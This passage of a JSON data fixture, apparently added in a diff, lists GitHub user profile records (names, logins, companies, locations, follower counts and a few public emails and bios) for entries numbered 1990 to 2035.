"2022-06-13T20:57:35Z", + "updated_at": "2024-09-09T09:57:17Z", + "node_id": "U_kgDOBmdiqw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1990, + "fields": { + "nest_created_at": "2024-09-12T00:32:26.512Z", + "nest_updated_at": "2024-09-12T00:32:26.512Z", + "name": "Viktor Thell", + "login": "viktorgunnarson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3408082?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-01-28T16:59:23Z", + "updated_at": "2024-08-12T11:42:07Z", + "node_id": "MDQ6VXNlcjM0MDgwODI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1991, + "fields": { + "nest_created_at": "2024-09-12T00:32:28.971Z", + "nest_updated_at": "2024-09-12T00:32:28.971Z", + "name": "Justin Beeson", + "login": "thisjustin816", + "email": "justinbeeson@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/41129295?v=4", + "company": "TIH", + "location": "San Diego, CA", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 11, + "created_at": "2018-07-11T21:08:12Z", + "updated_at": "2024-05-31T13:03:03Z", + "node_id": "MDQ6VXNlcjQxMTI5Mjk1", + "bio": "Platform Engineer, with a focus on Azure environments and PowerShell.", + "is_hireable": false, + "twitter_username": "thisjustin816" + } +}, +{ + "model": "github.user", + "pk": 1992, + "fields": { + "nest_created_at": "2024-09-12T00:32:30.156Z", + "nest_updated_at": "2024-09-12T00:32:30.156Z", + "name": "", + "login": "Dnu12", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28951334?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-05-25T11:55:17Z", + "updated_at": "2024-08-30T15:54:20Z", + "node_id": "MDQ6VXNlcjI4OTUxMzM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1993, + "fields": { + "nest_created_at": "2024-09-12T00:32:31.354Z", + "nest_updated_at": "2024-09-12T00:32:31.354Z", + "name": "Lars Bruun-Hansen", + "login": "lbruun", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32431476?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 2, + "public_repositories_count": 39, + "created_at": "2017-10-01T11:05:30Z", + "updated_at": "2024-08-05T08:35:22Z", + "node_id": "MDQ6VXNlcjMyNDMxNDc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1994, + "fields": { + "nest_created_at": "2024-09-12T00:32:32.540Z", + "nest_updated_at": "2024-09-12T00:32:32.540Z", + "name": "Sabuhi Gurbani", + "login": "sabuhigr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51547928?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2019-06-09T23:50:11Z", + "updated_at": "2023-08-15T07:20:25Z", + "node_id": "MDQ6VXNlcjUxNTQ3OTI4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1995, + "fields": { + "nest_created_at": "2024-09-12T00:32:33.724Z", + "nest_updated_at": "2024-09-12T00:32:33.724Z", + "name": "", + "login": "AbhilashR2020", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9784970?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 43, + "created_at": "2014-11-16T15:52:58Z", + "updated_at": "2024-08-02T06:19:14Z", + "node_id": "MDQ6VXNlcjk3ODQ5NzA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1996, + "fields": { + "nest_created_at": "2024-09-12T00:32:36.106Z", + "nest_updated_at": "2024-09-12T00:32:36.106Z", + "name": "Reuben Abela", + "login": "reubenbubu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3941381?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2013-03-22T13:21:56Z", + "updated_at": "2024-03-19T09:40:48Z", + "node_id": "MDQ6VXNlcjM5NDEzODE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1997, + "fields": { + "nest_created_at": "2024-09-12T00:32:36.926Z", + "nest_updated_at": "2024-09-12T00:32:36.926Z", + "name": "Mathias", + "login": "Oxydation", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8331862?v=4", + "company": "", + "location": "Austria", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2014-08-01T16:39:26Z", + "updated_at": "2024-09-04T05:40:30Z", + "node_id": "MDQ6VXNlcjgzMzE4NjI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1998, + "fields": { + "nest_created_at": "2024-09-12T00:32:38.160Z", + "nest_updated_at": "2024-09-12T00:32:38.160Z", + "name": "Armanit Garg", + "login": "rmn7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20014592?v=4", + "company": "@implydata ", + "location": "", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2016-06-18T14:12:28Z", + "updated_at": "2024-06-17T11:28:37Z", + "node_id": "MDQ6VXNlcjIwMDE0NTky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1999, + "fields": { + "nest_created_at": "2024-09-12T00:32:39.761Z", + "nest_updated_at": "2024-09-22T19:28:25.269Z", + "name": "Markus Szumovski", + "login": "echalone", + "email": "echalone@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6392389?v=4", + "company": "", + "location": "Vienna, Austria", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2014-01-13T18:44:35Z", + "updated_at": "2024-05-30T13:05:45Z", + "node_id": "MDQ6VXNlcjYzOTIzODk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2000, + "fields": { + "nest_created_at": "2024-09-12T00:32:41.427Z", + "nest_updated_at": "2024-09-12T00:32:41.427Z", + "name": "Liam Williams", + "login": "theangrydev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6877541?v=4", + "company": "@trafficparrot", + "location": "London", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 24, + "public_gists_count": 2, + "public_repositories_count": 96, + "created_at": "2014-03-06T21:58:07Z", + "updated_at": "2024-09-04T12:18:16Z", + "node_id": "MDQ6VXNlcjY4Nzc1NDE=", + "bio": "Changing the world, one character at a time...", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2001, + "fields": { + "nest_created_at": "2024-09-12T00:32:42.626Z", + "nest_updated_at": "2024-09-12T00:32:42.626Z", + "name": "Abhijat Chaturvedi", + "login": "abhijatchaturvedi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51148813?v=4", + "company": "CDAC-IIT", + "location": "New Delhi, NCR, India", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2019-05-29T05:24:51Z", + "updated_at": "2024-07-11T07:02:34Z", + "node_id": "MDQ6VXNlcjUxMTQ4ODEz", + "bio": "Researcher in the field of machine learning, artificial intelligence and deep learning. Have an interest in Data Science.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2002, + "fields": { + "nest_created_at": "2024-09-12T00:32:45.031Z", + "nest_updated_at": "2024-09-12T00:32:45.031Z", + "name": "Akash Rokade", + "login": "Akash-2001-git", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40690768?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2018-06-29T10:27:20Z", + "updated_at": "2024-04-03T11:45:42Z", + "node_id": "MDQ6VXNlcjQwNjkwNzY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2003, + "fields": { + "nest_created_at": "2024-09-12T00:32:47.450Z", + "nest_updated_at": "2024-09-12T00:32:47.450Z", + "name": "", + "login": "ahmedElmaghr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43854150?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 3, + "public_repositories_count": 16, + "created_at": "2018-10-04T14:29:05Z", + "updated_at": "2024-06-11T16:29:54Z", + "node_id": "MDQ6VXNlcjQzODU0MTUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2004, + "fields": { + "nest_created_at": "2024-09-12T00:32:49.982Z", + "nest_updated_at": "2024-09-22T19:28:17.261Z", + "name": "", + "login": "clayton-piscopo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17902323?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2016-03-17T10:45:12Z", + "updated_at": "2023-12-05T09:28:05Z", + "node_id": "MDQ6VXNlcjE3OTAyMzIz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2005, + "fields": { + "nest_created_at": "2024-09-12T00:32:52.334Z", + "nest_updated_at": "2024-09-12T00:32:52.334Z", + "name": "", + "login": "Casperxian", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/152158588?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-27T08:21:32Z", + "updated_at": "2024-04-03T07:28:32Z", + "node_id": "U_kgDOCRHBfA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2006, + "fields": { + "nest_created_at": "2024-09-12T00:32:53.533Z", + "nest_updated_at": "2024-09-12T00:32:53.533Z", + "name": "Laura", + "login": "lorriborri", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46646462?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-01-13T11:25:13Z", + "updated_at": "2024-09-10T10:18:10Z", + "node_id": "MDQ6VXNlcjQ2NjQ2NDYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2007, + "fields": { + "nest_created_at": "2024-09-12T00:32:54.750Z", + "nest_updated_at": "2024-09-22T19:35:49.559Z", + "name": "Andrey", + "login": "AndreyMZ", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9609370?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 28, + "created_at": "2014-11-07T13:14:23Z", + "updated_at": "2024-08-29T12:11:58Z", + "node_id": "MDQ6VXNlcjk2MDkzNzA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2008, + "fields": { + "nest_created_at": "2024-09-12T00:32:56.485Z", + "nest_updated_at": "2024-09-12T00:32:56.485Z", + "name": "Henrik Torland Klev", + "login": "henrik-klev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/106068062?v=4", + "company": "@PayEx", + "location": "Oslo", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-05-23T09:03:16Z", + "updated_at": "2024-09-03T11:46:23Z", + "node_id": "U_kgDOBlJ4Xg", + "bio": "You should hire me. I'm incredible.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2009, + "fields": { + "nest_created_at": "2024-09-12T00:32:57.675Z", + "nest_updated_at": "2024-09-22T19:29:11.921Z", + "name": "Joerg Heinicke", + "login": "JoergHeinicke5005", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53432510?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-07-29T11:29:37Z", + "updated_at": "2024-09-10T08:39:15Z", + "node_id": "MDQ6VXNlcjUzNDMyNTEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2010, + "fields": { + "nest_created_at": "2024-09-12T00:32:58.876Z", + "nest_updated_at": "2024-09-12T00:32:58.876Z", + "name": "", + "login": "ngybnc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44839908?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-11-07T13:34:12Z", + "updated_at": "2024-07-17T06:05:12Z", + "node_id": "MDQ6VXNlcjQ0ODM5OTA4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2011, + "fields": { + "nest_created_at": "2024-09-12T00:33:00.129Z", + "nest_updated_at": "2024-09-12T00:33:00.129Z", + "name": "", + "login": "eliassal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8447864?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 72, + "created_at": "2014-08-14T10:50:41Z", + "updated_at": "2024-09-10T11:29:15Z", + "node_id": "MDQ6VXNlcjg0NDc4NjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2012, + "fields": { + "nest_created_at": "2024-09-12T00:33:03.383Z", + "nest_updated_at": "2024-09-12T00:33:03.383Z", + "name": "", + "login": "amanske-ada", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111569011?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-08-19T09:41:04Z", + "updated_at": "2024-07-05T10:42:31Z", + "node_id": "U_kgDOBqZocw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2013, + "fields": { + "nest_created_at": "2024-09-12T00:33:06.195Z", + "nest_updated_at": "2024-09-12T00:33:06.195Z", + "name": "Mike@Savient", + "login": "mike-reynolds-savient", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84866450?v=4", + "company": "Savient UK Ltd", + "location": "Cheltenham, UK", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-05-26T16:39:24Z", + "updated_at": "2024-02-18T10:40:27Z", + "node_id": "MDQ6VXNlcjg0ODY2NDUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2014, + "fields": { + "nest_created_at": "2024-09-12T00:33:07.847Z", + "nest_updated_at": "2024-09-12T00:33:07.847Z", + "name": "Raghul Vishnu", + "login": "raghulvishnudhinesh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101252399?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-03-09T09:32:12Z", + "updated_at": "2023-10-04T08:35:37Z", + "node_id": "U_kgDOBgj9Lw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2015, + "fields": { + "nest_created_at": "2024-09-12T00:33:09.452Z", + "nest_updated_at": "2024-09-12T00:33:09.452Z", + "name": "Jakob Nohe", + "login": "foxylion", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2699280?v=4", + "company": "itdesign GmbH (@itdesign)", + "location": "Germany", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 41, + "public_gists_count": 6, + "public_repositories_count": 32, + "created_at": "2012-11-01T14:08:05Z", + "updated_at": "2024-09-06T11:23:51Z", + "node_id": "MDQ6VXNlcjI2OTkyODA=", + "bio": "Working as Lead Cloud Architect at @itdesign. Being a scout in my spare time.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2016, + "fields": { + "nest_created_at": "2024-09-12T00:33:11.460Z", + "nest_updated_at": "2024-09-12T00:33:11.460Z", + "name": "", + "login": "bhaskar-s-019", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9975934?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-11-27T11:34:59Z", + "updated_at": "2023-12-26T13:01:52Z", + "node_id": "MDQ6VXNlcjk5NzU5MzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2017, + "fields": { + "nest_created_at": "2024-09-12T00:33:14.315Z", + "nest_updated_at": "2024-09-12T00:33:14.315Z", + "name": "", + "login": "BenniG82", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6051664?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 24, + "created_at": "2013-11-27T16:20:36Z", + "updated_at": "2024-07-21T13:50:11Z", + "node_id": "MDQ6VXNlcjYwNTE2NjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2018, + "fields": { + "nest_created_at": "2024-09-12T00:33:17.174Z", + "nest_updated_at": "2024-09-12T00:33:17.174Z", + "name": "", + "login": "githubuserVenkat", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/155939959?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-01-08T05:03:39Z", + "updated_at": "2024-08-16T07:38:38Z", + "node_id": "U_kgDOCUt0dw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2019, + "fields": { + "nest_created_at": "2024-09-12T00:33:18.781Z", + "nest_updated_at": "2024-09-12T00:33:18.781Z", + "name": "Mustapha MANSOUR", + "login": "mumans", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12114835?v=4", + "company": "Neoxia", + "location": "Paris", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2015-04-25T18:10:28Z", + "updated_at": "2024-09-10T12:27:51Z", + "node_id": "MDQ6VXNlcjEyMTE0ODM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2020, + "fields": { + "nest_created_at": "2024-09-12T00:33:21.212Z", + "nest_updated_at": "2024-09-12T00:33:21.212Z", + "name": "Alec James", + "login": "alecjames", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26629256?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-03-23T15:14:35Z", + "updated_at": "2024-06-05T14:46:59Z", + "node_id": "MDQ6VXNlcjI2NjI5MjU2", + "bio": "Electronics, software, mechatronics engineer.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2021, + "fields": { + "nest_created_at": "2024-09-12T00:33:23.588Z", + "nest_updated_at": "2024-09-12T00:33:23.588Z", + "name": "Dan McLaughlin", + "login": "danshome", + "email": "dan@danshome.net", + "avatar_url": "https://avatars.githubusercontent.com/u/17056009?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2016-02-03T23:58:57Z", + "updated_at": "2024-08-26T13:25:11Z", + "node_id": "MDQ6VXNlcjE3MDU2MDA5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2022, + "fields": { + "nest_created_at": "2024-09-12T00:33:24.852Z", + "nest_updated_at": "2024-09-12T00:33:24.852Z", + "name": "", + "login": "DomZZ", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35232165?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2018-01-08T16:55:44Z", + "updated_at": "2024-06-17T20:34:29Z", + "node_id": "MDQ6VXNlcjM1MjMyMTY1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2023, + "fields": { + "nest_created_at": "2024-09-12T00:33:26.105Z", + "nest_updated_at": "2024-09-12T00:34:17.963Z", + "name": "Nitin Chavan", + "login": "a20nitin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/123905569?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-01-29T21:43:48Z", + "updated_at": "2024-03-19T13:00:38Z", + "node_id": "U_kgDOB2KmIQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2024, + "fields": { + "nest_created_at": "2024-09-12T00:33:28.555Z", + "nest_updated_at": "2024-09-12T00:33:28.555Z", + "name": "", + "login": "kiryl0277", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109075027?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-07-11T10:31:44Z", + "updated_at": "2024-01-22T13:30:01Z", + "node_id": "U_kgDOBoBaUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2025, + "fields": { + "nest_created_at": "2024-09-12T00:33:29.770Z", + "nest_updated_at": "2024-09-12T00:33:31.768Z", + "name": "", + "login": "proo4509", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31039083?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-08-15T13:41:12Z", + "updated_at": "2024-08-19T14:46:48Z", + "node_id": "MDQ6VXNlcjMxMDM5MDgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2026, + "fields": { + "nest_created_at": "2024-09-12T00:33:33.389Z", + "nest_updated_at": "2024-09-12T00:33:33.389Z", + "name": "", + "login": "zdani7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23515369?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2016-11-17T03:52:21Z", + "updated_at": "2023-09-26T18:56:34Z", + "node_id": "MDQ6VXNlcjIzNTE1MzY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2027, + "fields": { + "nest_created_at": "2024-09-12T00:33:34.694Z", + "nest_updated_at": "2024-09-12T00:33:34.694Z", + "name": "", + "login": "rahulsyal92", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68044738?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2020-07-09T04:18:20Z", + "updated_at": "2024-06-28T06:07:56Z", + "node_id": "MDQ6VXNlcjY4MDQ0NzM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2028, + "fields": { + "nest_created_at": "2024-09-12T00:33:35.494Z", + "nest_updated_at": "2024-09-12T00:33:35.494Z", + "name": "Alejandro Gomez Canal", + "login": "alexagc", + "email": "alexcanal@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16854770?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2016-01-23T17:18:10Z", + "updated_at": "2024-09-01T11:32:10Z", + "node_id": "MDQ6VXNlcjE2ODU0Nzcw", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2029, + "fields": { + "nest_created_at": "2024-09-12T00:33:36.718Z", + "nest_updated_at": "2024-09-12T00:33:36.718Z", + "name": "", + "login": "rocenpe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13677083?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-08-06T10:55:45Z", + "updated_at": "2024-04-04T08:09:01Z", + "node_id": "MDQ6VXNlcjEzNjc3MDgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2030, + "fields": { + "nest_created_at": "2024-09-12T00:33:37.950Z", + "nest_updated_at": "2024-09-12T00:33:37.950Z", + "name": "", + "login": "c24-jmiser", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/98899978?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-02-02T15:44:33Z", + "updated_at": "2024-04-04T20:14:10Z", + "node_id": "U_kgDOBeUYCg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2031, + "fields": { + "nest_created_at": "2024-09-12T00:33:39.212Z", + "nest_updated_at": "2024-09-12T00:33:39.212Z", + "name": "", + "login": "Dhanxi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/157735796?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-01-25T17:38:48Z", + "updated_at": "2024-01-30T21:40:41Z", + "node_id": "U_kgDOCWbbdA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2032, + "fields": { + "nest_created_at": "2024-09-12T00:33:40.418Z", + "nest_updated_at": "2024-09-12T00:33:40.418Z", + "name": "", + "login": "mertartanbtc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/135612047?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-06-05T11:29:05Z", + "updated_at": "2024-06-07T10:55:18Z", + "node_id": "U_kgDOCBVGjw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2033, + "fields": { + "nest_created_at": "2024-09-12T00:33:42.904Z", + "nest_updated_at": "2024-09-12T00:33:42.904Z", + "name": "Błażej Leśny", + "login": "blazeej", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3501788?v=4", + "company": "", + "location": "Poznań", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2013-02-07T13:41:39Z", + "updated_at": "2024-08-22T10:36:19Z", + "node_id": "MDQ6VXNlcjM1MDE3ODg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2034, + "fields": { + "nest_created_at": "2024-09-12T00:33:44.557Z", + "nest_updated_at": "2024-09-16T22:25:13.627Z", + "name": "Yaytay", + "login": "Yaytay", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3931112?v=4", + "company": "", + "location": "Oxfordshire", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2013-03-21T12:43:54Z", + "updated_at": "2024-09-12T07:21:14Z", + "node_id": "MDQ6VXNlcjM5MzExMTI=", + "bio": "Jim Talbut has been paid to move bits about for the past 25 years.\r\nI am currently working on microservice architecture and cloud migration for Group GTI.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2035, + "fields": { + "nest_created_at": "2024-09-12T00:33:45.756Z", + "nest_updated_at": "2024-09-12T00:33:45.756Z", + "name": "Daniel Norton", + "login": "dnorton", + "email": "daniel@dnorton.org", + "avatar_url": "https://avatars.githubusercontent.com/u/34991?v=4", + "company": "@Lean-Law-Labs ", + "location": "Charlotte, NC", + "collaborators_count": 0, + "following_count": 78, + "followers_count": 24, + "public_gists_count": 30, + "public_repositories_count": 28, + "created_at": "2008-11-17T15:13:21Z", + "updated_at": "2024-07-26T19:21:52Z", + "node_id": "MDQ6VXNlcjM0OTkx", 